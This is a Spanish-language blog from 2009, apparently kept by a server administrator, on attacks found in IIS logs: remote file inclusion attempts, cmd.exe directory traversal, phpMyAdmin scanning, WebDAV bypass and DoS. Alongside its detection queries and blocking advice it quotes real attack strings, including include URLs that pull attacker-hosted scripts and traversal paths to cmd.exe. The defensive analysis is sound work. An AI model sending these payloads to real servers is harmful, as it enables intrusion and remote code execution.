DoSHTTP
November 21, 2009
Con DoSHTTP se hace una denegación de servicio que podemos ver en los logs del servidor
2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp |14|800a0046|Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -
2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp |14|800a0046|Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -
Cadaver parcheado para acceder a fallo WebDav
November 15, 2009
cadaver/0.23.2+neon/0.28.0
cadaver/0.23.0+neon/0.28.2
Versiones de Cadaver parcheado para acceder a fallo WebDav
Desde hace unos días, estamos viviendo una especie de desafortunada vuelta a principios de esta década por culpa de un grave fallo de seguridad en Internet Information Server, el servidor web de Microsoft. Se ha descubierto una vulnerabilidad “como las de antes” y, lo peor, aprovechando fallos y problemas que parecían pertenecer ya al pasado, como de otro tiempo. Al parecer, el fallo está disparando el número de “desfiguraciones” (defaces) en servidores web con IIS en los últimos días.
A cualquiera que esté al tanto de las noticias sobre seguridad le sonará que las palabras IIS, WebDAV, unicode y la cabecera “Translate:f” (parte del protocolo WebDAV) son términos que juntos, no han traído nunca nada bueno al servidor de Microsoft en los últimos años. La vulnerabilidad que acaba de ser descubierta combina todos esos elementos. Se ha encontrado un fallo en IIS 6.x a la hora de procesar peticiones http especialmente manipuladas con la cabecera “Translate:f” y con caracteres Unicode. Esto puede permitir a un atacante eludir la autenticación (y subir ficheros si lo permiten los permisos) al disparar un problema de validación en WebDAV.
Inyección de código en foros SMF mediante avatares
May 11, 2009
Se sube el avatar en formato jpg y se ejecuta en el servidor, es necesario revisar los logs y tener a mano una copia de seguridad actualizada para poder restaurar.
http://www.daboweb.com/2009/05/10/inyeccion-de-codigo-en-foros-smf-mediante-avatares/
Más Includes en diferentes variables
May 8, 2009
Consulta para detectar los includes en variables:
SELECT [cs-uri-query], COUNT(*) AS EXPR1
FROM tabla
where (rutalog = ‘c:\a\W3SVC1′) and [cs-uri-query] like ‘%=http%’
GROUP BY [cs-uri-query]
ORDER BY 2 desc
Include en diferentes variables:
mosConfig_absolute_path=http:///photo.gif?
phpbb_root_path=http:///photo.gif?
theme_path=http:///photo.gif?
dir=http:///photo.gif?
baseDir=http:///photo.gif?
config[path_src_include]=http:///photo.gif?
inc_dir=http:///photo.gif?
page=http:///photo.gif?
HCL_path=http:///photo.gif?
Includes del mes
May 8, 2009
Peticiones de includes en el mes de Abril y principios de Mayo:
//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.xxx.xx/dev/bid.gif?
//phpweb/include/version.inc(x=http://www.xxx.xx/dev/bid.gif?
/principal.php?abre=http://www.xxx.xx/Fx29id.txt?
/principal.php?abre=http://www.xxx.xx/Fx29id.txt?
//arcade.php?phpbb_root_path=http://www.xxx.xx/cfg/id.txt????
//arcade.php?phpbb_root_path=http://www.xxx.xx/cfg/id.txt????
//arcade.php?phpbb_root_path=http://www.xxx.xx/cfg/id.txt????
//arcade.php?phpbb_root_path=http://www.xxx.xx/cfg/id.txt????
//arcade.php?phpbb_root_path=http://www.xxx.xx/cfg/id.txt????
//arcade.php?phpbb_root_path=http://www.xxx.xx/cfg/id.txt????
//arcade.php?phpbb_root_path=http://www.xxx.xx/images/tops.gif???
//arcade.php?phpbb_root_path=http://www.xxx.xx/phpATM/cfg/baner.txt??
//arcade.php?phpbb_root_path=http://www.xxx.xx/logopsd/raid.txt???
/iframe.php?file=http://www.xxx.xx/cgi/t.dat?&list=1&cmd=id
Intentan añadirse como variables includes en el código.
MSOffice/cltreq.asp?
May 8, 2009
Son ficheros de Microsoft Office Server Extensions.
Instalaciones en phpMyAdmin
May 3, 2009
15:01:21 W3SVC1 0.0.0.0 GET /phpMyAdmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /main.php – 80 – 0.0.0.0 – 404 0 2
15:01:21 W3SVC1 0.0.0.0 GET /php/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /PMA/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /phpmyadmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /phpmyadmin2/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /db/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /mysql/main.php – 80 – 0.0.0.0 – 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /myadmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /phpmyadmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /phpMyAdmin/main.php – 80 – 0.0.0.0 – 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /myadmin/main.php – 80 – 0.0.0.0 – 404 0 3
Recomendaciones para posibles ataques en phpMyAdmin
- Actualizar phpMyAdmin
- Cambiar la ruta
- Autenticar directorio
cmd.exe + query
April 30, 2009
La query que se asocia al ataque del cmd “/c+dir+c:\?/c+dir+c:\” y quiere decir que nos haga un dir en el directorio c:\.
La filosofía del ataque es salir del directorio donde tenemos las páginas y llegar a un nivel concreto.
La consulta para poder sacar el fichero y la query:
SELECT [cs-uri-stem], [cs-uri-query]
FROM tabla
where [cs-uri-stem] like ‘%?%’
ORDER BY 1 desc
cmd.exe
April 30, 2009
Se intenta en diferentes subcarpetas:
- /scripts/..??../winnt/system32/cmd.exe
- /msadc/..??../..??../..??../winnt/system32/cmd.exe
- /_vti_bin/..??../..??../..??../winnt/system32/cmd.exe
Detectado en la consulta:
SELECT [cs-uri-stem], COUNT(*) AS EXPR1
FROM tabla
where [cs-uri-stem] like ‘%?%’
GROUP BY [cs-uri-stem]
ORDER BY 2 desc
Bloquear el ataque utilizando la ip de origen ó la cadena de entrada ‘..??..’.
